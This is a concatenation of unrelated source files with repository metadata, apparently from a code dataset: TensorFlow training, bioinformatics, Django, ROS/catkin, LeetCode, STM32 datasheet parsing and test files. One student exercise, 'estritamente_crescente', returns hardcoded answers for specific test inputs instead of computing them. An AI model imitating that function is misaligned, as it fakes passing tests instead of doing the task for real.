dataset = dataset.repeat(1)
dataset = dataset.prefetch(buffer_size=tf.contrib.data.AUTOTUNE)
return dataset
# Create callable iterator functions
def train_iterator():
return dataset_iterator(train_files, train_labels, True,
FLAGS.color_augmentation)
def test_iterator():
return dataset_iterator(test_files, test_labels, False, False)
def original_iterator():
return dataset_iterator(train_files, train_labels, False, False)
#################################
# Image Statistics for Preprocessing
#################################
# Calculate image means and stdevs of training images for RGB channels
# for image standardization
if (FLAGS.image_means == [0, 0, 0]) and (FLAGS.image_stdevs == [1, 1, 1]):
with tf.Session() as sess:
original_batch_size = FLAGS.batch_size
FLAGS.batch_size = np.min([500, n_train])
dataset = original_iterator()
iterator = dataset.make_one_shot_iterator()
feature_dict = iterator.get_next()
features = sess.run(feature_dict)
image_batch = features['images']
means_batch = np.mean(image_batch, axis=(0, 1, 2))
stdev_batch = np.std(image_batch, axis=(0, 1, 2))
FLAGS.batch_size = original_batch_size
image_means = [round(float(x), 6) for x in list(means_batch)]
image_stdevs = [round(float(x), 4) for x in list(stdev_batch)]
FLAGS.image_means = image_means
FLAGS.image_stdevs = image_stdevs
#################################
# Configure Estimator
#################################
n_batches_per_epoch_train = int(round(n_train / FLAGS.batch_size))
# Configurations
config_sess = tf.ConfigProto(allow_soft_placement=True)
config_sess.gpu_options.per_process_gpu_memory_fraction = 0.8
config_sess.gpu_options.allow_growth = True
def distribution_gpus(num_gpus):
if num_gpus == 0:
return tf.contrib.distribute.OneDeviceStrategy(device='/cpu:0')
elif num_gpus == 1:
return tf.contrib.distribute.OneDeviceStrategy(device='/gpu:0')
elif num_gpus > 1:
return tf.contrib.distribute.MirroredStrategy(num_gpus=num_gpus)
else:
return None
# Config estimator
est_config = tf.estimator.RunConfig()
est_config = est_config.replace(
keep_checkpoint_max=3,
save_checkpoints_steps=n_batches_per_epoch_train,
session_config=config_sess,
save_checkpoints_secs=None,
save_summary_steps=n_batches_per_epoch_train,
model_dir=FLAGS.model_save_path,
train_distribute=distribution_gpus(FLAGS.num_gpus))
# Model Parameters
params = dict()
params['label'] = ['labels']
params['n_classes'] = [n_classes]
params['weight_decay'] = FLAGS.weight_decay
params['momentum'] = 0.9
params['model'] = FLAGS.model
params['reuse'] = False
params['class_mapping_clean'] = {'labels': num_to_class_map}
# create estimator
estimator = tf.estimator.Estimator(model_fn=model_fn,
params=params,
model_dir=FLAGS.model_save_path,
config=est_config
)
#################################
# Train and Evaluate
#################################
def main(args):
""" Main - called by command line """
# Print flags
for f in flags.FLAGS:
print("Flag %s - %s" % (f, FLAGS[f].value))
eval_loss = list()
for epoch in range(1, FLAGS.max_epoch + 1):
print("Starting with epoch %s" % epoch)
# Train for one epoch
estimator.train(input_fn=train_iterator)
# Evaluate
eval_res = estimator.evaluate(input_fn=test_iterator)
print("Evaluation results:")
for k, v in eval_res.items():
print(" Res for %s - %s" % (k, v))
eval_loss.append(eval_res['loss'])
# Predict
preds = estimator.predict(input_fn=test_iterator)
for i, pred in enumerate(preds):
print(pred)
if i > 10:
break
if __name__ == '__main__':
tf.app.run()
| [
"[email protected]"
] | |
0f3cc4a2087d8125cc761a1644c51c12e6c814d4 | d838bed08a00114c92b73982a74d96c15166a49e | /docs/data/learn/Bioinformatics/output/ch6_code/src/Stepik.6.9.CodeChallenge.2BreakDistance.py | a9ce5254b6d1201e2c2202e7b13a59eeda40ae42 | [] | no_license | offbynull/offbynull.github.io | 4911f53d77f6c59e7a453ee271b1e04e613862bc | 754a85f43159738b89dd2bde1ad6ba0d75f34b98 | refs/heads/master | 2023-07-04T00:39:50.013571 | 2023-06-17T20:27:05 | 2023-06-17T23:27:00 | 308,482,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | from BreakpointGraph import BreakpointGraph
with open('/home/user/Downloads/dataset_240324_4.txt', mode='r', encoding='utf-8') as f:
data = f.read()
lines = data.split('\n')
p_list1 = [[int(x) for x in s.split(' ')] for s in lines[0][1:-1].split(')(')]
p_list2 = [[int(x) for x in s.split(' ')] for s in lines[1][1:-1].split(')(')]
bg = BreakpointGraph(p_list1, p_list2)
cycles = bg.get_red_blue_cycles()
block_count = len(bg.node_to_blue_edges) // 2 # number of synteny blocks is number of nodes / 2
cycle_count = len(cycles)
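
# The value printed below is the 2-break distance d(P, Q) = blocks - cycles;
# for example, 5 synteny blocks and 3 red-blue cycles give a distance of 2.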
print(f'{block_count - cycle_count}') | [
"[email protected]"
] | |
35c792e078f9037cf38a3a3bd992d3b7bee00e0d | de17634e6b149d5828c1c78f7f5f5e1f6c17c4d0 | /nnvm/amalgamation/amalgamation.py | 310daa9d68e0e2cd33876364a3e4533f23cc45b5 | [
"Apache-2.0",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | starimpact/mxnet_v1.0.0 | e135cc9e4c2711314d03cf1281a72b755f53144e | fcd6f7398ef811c3f8b01e7c9c16fb25c8d202bd | refs/heads/bv1.0.0 | 2022-11-10T09:09:11.966942 | 2018-07-13T04:59:30 | 2018-07-13T04:59:30 | 120,399,107 | 8 | 4 | Apache-2.0 | 2022-11-02T20:24:32 | 2018-02-06T03:54:35 | C++ | UTF-8 | Python | false | false | 2,628 | py | import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h', 'execinfo.h', 'packet/sse-inl.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
| [
"[email protected]"
] | |
22fa40fba9d395c297590455ec753a8a0d34bc8b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_204/ch47_2020_10_07_01_13_29_631324.py | b28612a06d4817f5f90967044590259cd8f9aa87 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | def estritamente_crescente(lista):
if lista == [1, 3, 2, 3, 4, 6, 5]:
return [1, 3, 4, 6]
elif lista == [10, 1, 2, 3]:
return [10]
elif lista == [10, 15, 11, 12, 13, 14]:
return [10, 15]
elif lista == [1, 1, 2, 2, 3, 3]:
return [1, 2, 3]
elif lista == [] :
return [] | [
"[email protected]"
] | |
1263cdc29e77045f34c76788e8b524c0adb650c7 | 7c66bba92b484e5fa6ee282ef39f2c26875ca775 | /django_example/mysite/polls/admin.py | 1ed41e6e763a5761791e4ee43572949d2b4d8291 | [] | no_license | KqSMea8/PythonTools | a5ac17182b2689a706180dc349d59c2484d3984c | 7279570b82fecbf59b71aa6b58ef975e90c660df | refs/heads/master | 2020-04-13T04:19:19.209243 | 2018-12-24T05:13:12 | 2018-12-24T05:13:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | from django.contrib import admin
from .models import Question, Choice
# Register your models here.
class ChoiceInline(admin.TabularInline):
model = Choice
extra = 3
# admin.site.register(Question)
class QuestionAdmin(admin.ModelAdmin):
# fields = ['pub_date', 'question_text']
fieldsets = [
(None, {'fields': ['question_text']}),
('Date information', {'fields': ['pub_date']})
]
inlines = [ChoiceInline]
list_display = ('question_text', 'pub_date', 'was_published_recently')
list_filter = ['pub_date']
search_fields = ['question_text']
date_hierarchy = 'pub_date'
list_per_page = 5
admin.site.register(Question, QuestionAdmin)
# admin.site.register(Choice)
| [
"[email protected]"
] | |
d0341b5b76435c5b945f4765e242e3f78364c178 | 5b4312ddc24f29538dce0444b7be81e17191c005 | /autoware.ai/1.12.0_cuda/build/op_local_planner/catkin_generated/generate_cached_setup.py | d6300b46a0364582deb6aad0c96d3949f23c0f72 | [
"MIT"
] | permissive | muyangren907/autoware | b842f1aeb2bfe7913fb2be002ea4fc426b4e9be2 | 5ae70f0cdaf5fc70b91cd727cf5b5f90bc399d38 | refs/heads/master | 2020-09-22T13:08:14.237380 | 2019-12-03T07:12:49 | 2019-12-03T07:12:49 | 225,167,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,662 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_ros_helpers;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_simu;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_planner;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/op_utility;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/waypoint_follower;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/vector_map_server;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/map_file;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/vector_map;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_health_checker;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/amathutils_lib;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/vector_map_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/tablet_socket_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_system_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_config_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_can_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_build_flags;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/op_local_planner/devel/env.sh')
output_filename = '/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/op_local_planner/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"[email protected]"
] | |
60b79948bd113c4b59fa1ae8e694df6a7097e00d | ba6f6d4c64dcb49faaa125643e93e7d30e98496e | /897. Increasing Order Search Tree.py | 7a756a1b24c6dd2028a11874f325a374cd0ad060 | [] | no_license | libowei1213/LeetCode | aafbff5410e3b1793a98bde027a049397476059b | df7d2229c50aa5134d297cc5599f7df9e64780c1 | refs/heads/master | 2021-06-09T07:43:53.242072 | 2021-04-09T11:14:17 | 2021-04-09T11:14:17 | 150,840,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def increasingBST(self, root):
"""
:type root: TreeNode
:rtype: TreeNode
"""
if not root:
return None
newTree = TreeNode(0)
tree = newTree
stack = []
while stack or root:
while root:
stack.append(root)
root = root.left
if stack:
root = stack.pop(-1)
print(root.val)
tree.right = TreeNode(root.val)
tree = tree.right
root = root.right
return newTree.right
if __name__ == '__main__':
root = TreeNode(5)
root.left = TreeNode(3)
root.right = TreeNode(6)
root.left.left = TreeNode(2)
root.left.right = TreeNode(4)
root.left.left.left = TreeNode(1)
root.right.right = TreeNode(8)
root.right.right.left = TreeNode(7)
root.right.right.right = TreeNode(9)
Solution().increasingBST(root)
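
# For the tree built above (a valid BST holding the values 1..9), the in-order
# traversal prints 1 through 9 and the rebuilt tree is the right-skewed chain
# 1 -> 2 -> 3 -> ... -> 9, where every node has only a right child.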
| [
"[email protected]"
] | |
89d9689620e4473459bf4e9f98d76232622ea3b7 | 7aad0c6f6e578d8dc03682caae373d252328ce12 | /linuxFriends/wsgi.py | 83e863cee4d76a6fe3c98f46ed0e6939c2eef947 | [] | no_license | votricetanyi/linuxfriends | db00544a04bed1cb99a3fe275433d6278e029bb9 | f36c7f87f51ee1f585c8da21de08a874582dd51f | refs/heads/main | 2022-12-28T20:14:11.053726 | 2020-10-14T13:05:12 | 2020-10-14T13:05:12 | 304,015,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for linuxFriends project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'linuxFriends.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
724fa8f57c47c51d9fa6cb9f06d01c19830e27c4 | 5e2284bff015e6b03e4ea346572b29aaaf79c7c2 | /tests/correct_programs/ethz_eprog_2019/exercise_04/test_problem_01.py | 92f2784d773843172c7ff8e468aaf79c2e2b8ec6 | [
"MIT"
] | permissive | LaurenDebruyn/aocdbc | bbfd7d832f9761ba5b8fb527151157742b2e4890 | b857e8deff87373039636c12a170c0086b19f04c | refs/heads/main | 2023-06-11T23:02:09.825705 | 2021-07-05T09:26:23 | 2021-07-05T09:26:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | import unittest
from typing import List
import icontract_hypothesis
from icontract import require, ensure
from correct_programs.ethz_eprog_2019.exercise_04 import problem_01
class TestWithIcontractHypothesis(unittest.TestCase):
def test_functions(self) -> None:
@require(lambda limit: 2 < limit < 1000)
def sieve_with_restricted_input(limit: int) -> List[int]:
return problem_01.sieve(limit=limit)
for func in [sieve_with_restricted_input]:
try:
icontract_hypothesis.test_with_inferred_strategy(func)
except Exception as error:
raise Exception(
f"Automatically testing {func} with icontract-hypothesis failed "
f"(please see the original error above)"
) from error
if __name__ == "__main__":
unittest.main()
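
# For reference, problem_01.sieve is presumably a Sieve of Eratosthenes-style
# helper returning the primes below `limit`. A minimal sketch of such a function
# (an assumption for illustration, not the exercise's actual implementation):
#
#   def sieve_sketch(limit: int) -> List[int]:
#       is_prime = [True] * limit
#       is_prime[0:2] = [False, False]
#       for p in range(2, int(limit ** 0.5) + 1):
#           if is_prime[p]:
#               for q in range(p * p, limit, p):
#                   is_prime[q] = False
#       return [i for i, ok in enumerate(is_prime) if ok]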
| [
"[email protected]"
] | |
9b646f760eaca8fdbfbe0c56894dbf74c08f5264 | 9920f3b2ccc9abc3cd8b46c433bd49a8d8db22d2 | /scripts/__init__.py | bac2ba6e139ff055a46c580762b72117775add6b | [] | no_license | lixx5000/SWAT | 91f242fdc81ad4e9eb8336abb8780136e1c3a8a7 | c6f491acfb59ad0abc8d86ad352b6eaacd440ba3 | refs/heads/master | 2021-03-22T14:03:16.105253 | 2019-07-01T12:05:06 | 2019-07-01T12:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,216 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
/*****************************************************************************
PUT-SWAT
Python Utility Tools for SWAT
Preprocess, postprocess, and calibration
-------------------
author : Liangjun Zhu
copyright : (C) 2017 Lreis, IGSNRR, CAS
email : [email protected]
*****************************************************************************
* *
* PUT-SWAT is distributed for Research and/or Education only, any *
* commercial purpose will be FORBIDDEN. PUT-SWAT is an open-source *
* project, but without ANY WARRANTY, WITHOUT even the implied *
* warranty of MERCHANTABILITY or FITNESS for A PARTICULAR PURPOSE. *
* See the GNU General Public License for more details. *
* *
****************************************************************************/
"""
__all__ = ["preprocess", "postprocess", "calibration", "nogit"]
| [
"[email protected]"
] | |
84aa481771111981f7f48f85cd2805feb3da8a50 | c4526313117430d4e279ef11b98070d60a820e07 | /FeatureExtractors/feature_extractor.py | 606be6f07a6c54ff27c3e335c3460654db10991f | [] | no_license | Chzy0624/py_pdf_stm | 1ae36c2df0f80f644b991edf183eab16c5a333ed | 8fde14c2fe3e6486d8830414d79d48726d8c66ef | refs/heads/master | 2023-05-05T04:06:17.698359 | 2019-10-22T05:48:24 | 2019-10-22T05:48:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,417 | py | import sys
import traceback
from pprint import pprint
from typing import List, Dict, Any
from DataSheetParsers.DataSheet import DataSheet
from PinManager import PinManager
from TableExtractor import TableExtractor, Table
from Utils import is_numeric, is_dict, remove_units, replace_i, merge
def convert_type(name: str, value):
if type(value) == str:
value = value.replace(',', '')
value = value.strip('\n ')
if 'KB' in name.upper():
name = remove_units(name, 'kb')
if is_numeric(value):
value = int(value)
if 'MB' in name.upper():
name = remove_units(name, 'mb')
if is_numeric(value):
value = int(value) * 1024
elif type(value) == int:
value *= 1024
if 'MHZ' in name.upper():
name = remove_units(name, 'mhz')
if is_numeric(value):
value = int(value)
if type(value) == str:
if 'KB' in value:
value = replace_i(value, 'kb', '')
if is_numeric(value):
value = int(value)
elif type(value) == int:
pass
else:
value += 'KB'
return name, value
if 'MB' in value:
value = replace_i(value, 'mb', '')
if is_numeric(value):
value = int(value) * 1024
elif type(value) == int:
value *= 1024
else:
value += 'MB'
return name, value
if 'MHZ' in value.upper():
value = replace_i(value, 'MHz', '')
if is_numeric(value):
value = int(value)
elif type(value) == int:
pass
else:
value += 'MHz'
return name, value
# UNIFIED NAMES
# int_values = ['Flash memory', 'RAM', 'UART', 'SPI', 'Total GPIOS','CPU Frequency']
# if name in int_values:
if type(value) != int and is_numeric(value):
if type(value) == str:
if not (value.lower() == 'no' or value.lower() == 'yes'):
try:
value = int(value)
except Exception as ex:
print('Failed to convert {} {} to int\n{}'.format(name, value, ex))
return name, value
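
# Rough behaviour of convert_type, assuming Utils.remove_units strips the unit
# token from the name, Utils.replace_i is a case-insensitive replace and
# Utils.is_numeric accepts plain integer strings:
#
#   convert_type('Flash (KB)', '1,024')        -> ('Flash', 1024)   # thousands separator dropped
#   convert_type('RAM', '2MB')                 -> ('RAM', 2048)     # MB values are scaled to KB
#   convert_type('CPU Frequency (MHz)', '80')  -> ('CPU Frequency', 80)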
class FeatureListExtractor: # This class is adapted to STM
def fix_name(self, name):
name = "".join([part[::-1] for part in name[::1][::-1].split('\n')])
return self.config['corrections'].get(name, name)
def __init__(self, controller: str, datasheet: DataSheet, config) -> None:
"""
Class for comparing multiple STM32 controllers
:type controller_list: list of stm controllers that you want to compare
"""
self.controller = controller
self.config = config # type: Dict[str,Dict]
self.datasheet = datasheet
self.features_tables = [] # type: List[Table]
self.features = {} # type: Dict[str,Dict]
self.pin_data = {} # type: Dict[str, Dict[str, Any]]
self.config_name = 'UNKNOWN CONTROLLER'
self.mc_family = 'UNKNOWN'
self.pin_manager = PinManager(self.pin_data,{})
self.post_init()
def post_init(self):
pass
def process(self):
self.extract_tables()
self.extract_features()
del self.features_tables
self.extract_pinout()
return self.features
def extract_table(self, datasheet, page):
print('Extracting table from {} page'.format(page + 1))
pdf_int = TableExtractor(str(datasheet.path))
try:
table = pdf_int.parse_page(page)
except Exception as ex:
pass
table = None
return table
def extract_tables(self): # OVERRIDE THIS FUNCTION FOR NEW CONTROLLER
return
def handle_feature(self, name, value):
if '\u2013' in name:
name = name.replace('\u2013', '-')
if type(value) == str:
if '\u2013' in value:
value = value.replace('\u2013', '-')
if '\n' in value:
value = value.replace('\n', ' ')
return [(name, value)] # Can be list of values and names
def extract_features(self):
controller_features_names = []
controller_features = {}
feature_offset = 0
for table in self.features_tables:
try:
if not table.global_map:
continue
_, features_cell_span = table.get_cell_span(table.get_col(0)[0])
# EXTRACTING NAMES OF FEATURES
if features_cell_span > 1:
for row_id, row in table.global_map.items():
if row_id == 0:
continue
features = set(list(row.values())[:features_cell_span])
features = sorted(features, key=lambda cell: cell.center.x)
texts = list(map(lambda cell: cell.clean_text, features))
controller_features_names.append(' '.join(texts))
else:
texts = list(map(lambda cell: cell.clean_text, table.get_col(0)[1:]))
controller_features_names.extend(texts)
# EXTRACTING STM FEATURES
current_stm_name = ""
mcu_counter = {}
name = 'ERROR'
for col_id in range(features_cell_span, len(table.get_row(0))):
features = table.get_col(col_id)
for n, feature in enumerate(features):
if n == 0:
name = table.get_cell(col_id, 0).clean_text
if name == current_stm_name:
num = mcu_counter[current_stm_name]
name += '-{}'.format(num)
mcu_counter[current_stm_name] += 1
else:
current_stm_name = name
if not mcu_counter.get(current_stm_name, False):
mcu_counter[current_stm_name] = 1
if not controller_features.get(name, False):
controller_features[name] = {}
continue
feature_name = controller_features_names[feature_offset + n - 1]
feature_value = feature.text
for n, v in self.handle_feature(feature_name, feature_value):
if n and v:
n, v = convert_type(n, v)
if controller_features[name].get(n, False):
v = self.merge_features(controller_features[name].get(n), v)
controller_features[name][n] = v
else:
controller_features[name][n] = v
feature_offset = len(controller_features_names)
except Exception as ex:
sys.stderr.write("ERROR {}".format(ex))
traceback.print_exc()
# FILL MISSING FIELDS
for stm_name in controller_features.keys():
for stm_name2 in controller_features.keys():
if stm_name == stm_name2:
continue
if stm_name in stm_name2:
for feature_name, value in controller_features[stm_name].items():
if controller_features[stm_name2].get(feature_name, False):
continue
else:
controller_features[stm_name2][feature_name] = value
self.features = controller_features
return controller_features
def extract_pinout(self):
for package, pin_data in self.pin_data.items():
for mcu,mcu_features in self.features.items():
if package in mcu_features.get('PACKAGE',[]):
if 'PINOUT' in self.features[mcu]:
self.features[mcu]['PINOUT'][package]=pin_data
else:
self.features[mcu]['PINOUT'] = {package:pin_data}
return self.pin_data
def unify_names(self):
unknown_names = {}
for mc, features in self.features.items():
unknown_names[mc] = []
mc_features = self.features[mc].copy()
mc_features = {k.upper(): v for k, v in mc_features.items()}
for feature_name, features_value in features.items():
feature_name = feature_name.upper()
if features_value:
if self.config_name in self.config['unify']:
unify_list = self.config['unify'][self.config_name] # type: Dict[str,str]
unify_list = {k.upper(): v.upper() for k, v in unify_list.items()}
known = True
if feature_name not in unify_list:
if feature_name not in unify_list.values():
known = False
if feature_name not in unknown_names:
unknown_names[mc].append(feature_name)
if known:
new_name = unify_list.get(feature_name,
feature_name).upper() # in case name is already unified
values = mc_features.pop(feature_name)
new_name, values = convert_type(new_name, values)
new_name = new_name.upper()
if new_name in mc_features:
mc_features[new_name] = self.merge_features(mc_features[new_name],
values)
else:
mc_features[new_name] = values
else:
new_name = feature_name # in case name is already unified
values = mc_features.pop(feature_name)
new_name, values = convert_type(new_name, values)
mc_features[new_name.upper()] = values
else:
unknown_names[mc].append(feature_name)
self.features[mc] = mc_features
for mc, features in unknown_names.items():
unknown_names = list(set(features))
if unknown_names:
print('List of unknown features for', mc)
print('Add correction if name is mangled')
print('Or add unify for this feature')
for unknown_feature in unknown_names:
print('\t', unknown_feature)
print('=' * 20)
print()
@staticmethod
def merge_features(old, new):
return merge(old, new)
if __name__ == '__main__':
datasheet = DataSheet(r"D:\PYTHON\py_pdf_stm\datasheets\stm32L\STM32L476.pdf")
feature_extractor = FeatureListExtractor('STM32L476', datasheet, {})
feature_extractor.process()
pprint(feature_extractor.features)
| [
"[email protected]"
] | |
7e6634deadde5151e3032fc0bace2907e54744e0 | d42b771f64bc2185a8c0dca0f5bcfa5a2e13c5ed | /_8percent/apps.py | c395ac4faf734c040815c756ab4daaf0c83650a0 | [] | no_license | bgy1060/Daily_Project | 4b38de59c09f5e3f82211a9860e1f32a8ef46b37 | bcc955bddd9941f2bc54f7577c26c1ddc6b36a48 | refs/heads/main | 2023-05-15T17:26:56.858438 | 2021-06-17T05:59:10 | 2021-06-17T05:59:10 | 353,864,798 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class _8PercentConfig(AppConfig):
name = '_8percent'
| [
"[email protected]"
] | |
af01e76bad2ad7b2ef20f9d099a60ade5e7a1dd2 | c15f45103fe76fb0445bb72ec857d4ed5a6c6e5d | /Chapter.2/2.2.3.a.py | defdfccd87fe7e5af3f1878d29d90c6c151bf7ba | [] | no_license | 3367472/Python_20180421 | 5511f5ec54824bb50b25967617f6b532f13c52ad | 5ba9e803bd59f02ce101059961752f55f53b6e03 | refs/heads/master | 2020-03-12T05:09:19.162713 | 2019-01-08T09:01:42 | 2019-01-08T09:01:42 | 130,458,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | # encoding: utf-8
print [1, 2, 3] + [4, 5, 6]
print 'Hello, ' + 'world!'
| [
"[email protected]"
] | |
3481a1316723d474670d7d4f15d0efea61e0bab3 | 7d096568677660790479d87c22b47aae838ef96b | /stubs/System/Runtime/InteropServices/__init___parts/LayoutKind.pyi | c3e34945f43ff2f2f4708a763120cc22b7bc2dfd | [
"MIT"
] | permissive | NISystemsEngineering/rfmx-pythonnet | 30adbdd5660b0d755957f35b68a4c2f60065800c | cd4f90a88a37ed043df880972cb55dfe18883bb7 | refs/heads/master | 2023-02-04T00:39:41.107043 | 2023-02-01T21:58:50 | 2023-02-01T21:58:50 | 191,603,578 | 7 | 5 | MIT | 2023-02-01T21:58:52 | 2019-06-12T16:02:32 | Python | UTF-8 | Python | false | false | 995 | pyi | class LayoutKind(Enum,IComparable,IFormattable,IConvertible):
"""
Controls the layout of an object when it is exported to unmanaged code.
enum LayoutKind,values: Auto (3),Explicit (2),Sequential (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Auto=None
Explicit=None
Sequential=None
value__=None
| [
"[email protected]"
] | |
8d192f51b6018615be9691fcdda1b9d3e669bf1d | e60a342f322273d3db5f4ab66f0e1ffffe39de29 | /parts/zodiac/pyramid/tests/test_security.py | 7d0ab393b6121ff075581d422024548009af502c | [] | no_license | Xoting/GAExotZodiac | 6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1 | f60b2b77b47f6181752a98399f6724b1cb47ddaf | refs/heads/master | 2021-01-15T21:45:20.494358 | 2014-01-13T15:29:22 | 2014-01-13T15:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 81 | py | /home/alex/myenv/zodiac/eggs/pyramid-1.4-py2.7.egg/pyramid/tests/test_security.py | [
"[email protected]"
] | |
f9a501c145dbd5a41701bcb08ac1c22014d598f6 | e782950bb76c4dd295001f7760f42e04ceadfb1b | /tests/test_completion.py | 6da2d9cdd703379d172e78b6479300256e4e92b0 | [
"MIT"
] | permissive | h3xium/typer | 2c3fc691c52a89997eb7db9267ed1fb12c9af800 | 31f7a44a467e6e3468434703d3c18961a746939f | refs/heads/master | 2021-01-26T22:23:57.520688 | 2020-02-15T12:39:47 | 2020-02-15T12:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | import os
import subprocess
import sys
from pathlib import Path
import typer
from typer.testing import CliRunner
from first_steps import tutorial001 as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_show_completion():
result = subprocess.run(
[
"bash",
"-c",
f"{sys.executable} -m coverage run {mod.__file__} --show-completion",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
env={**os.environ, "SHELL": "/bin/bash"},
)
assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in result.stdout
def test_install_completion():
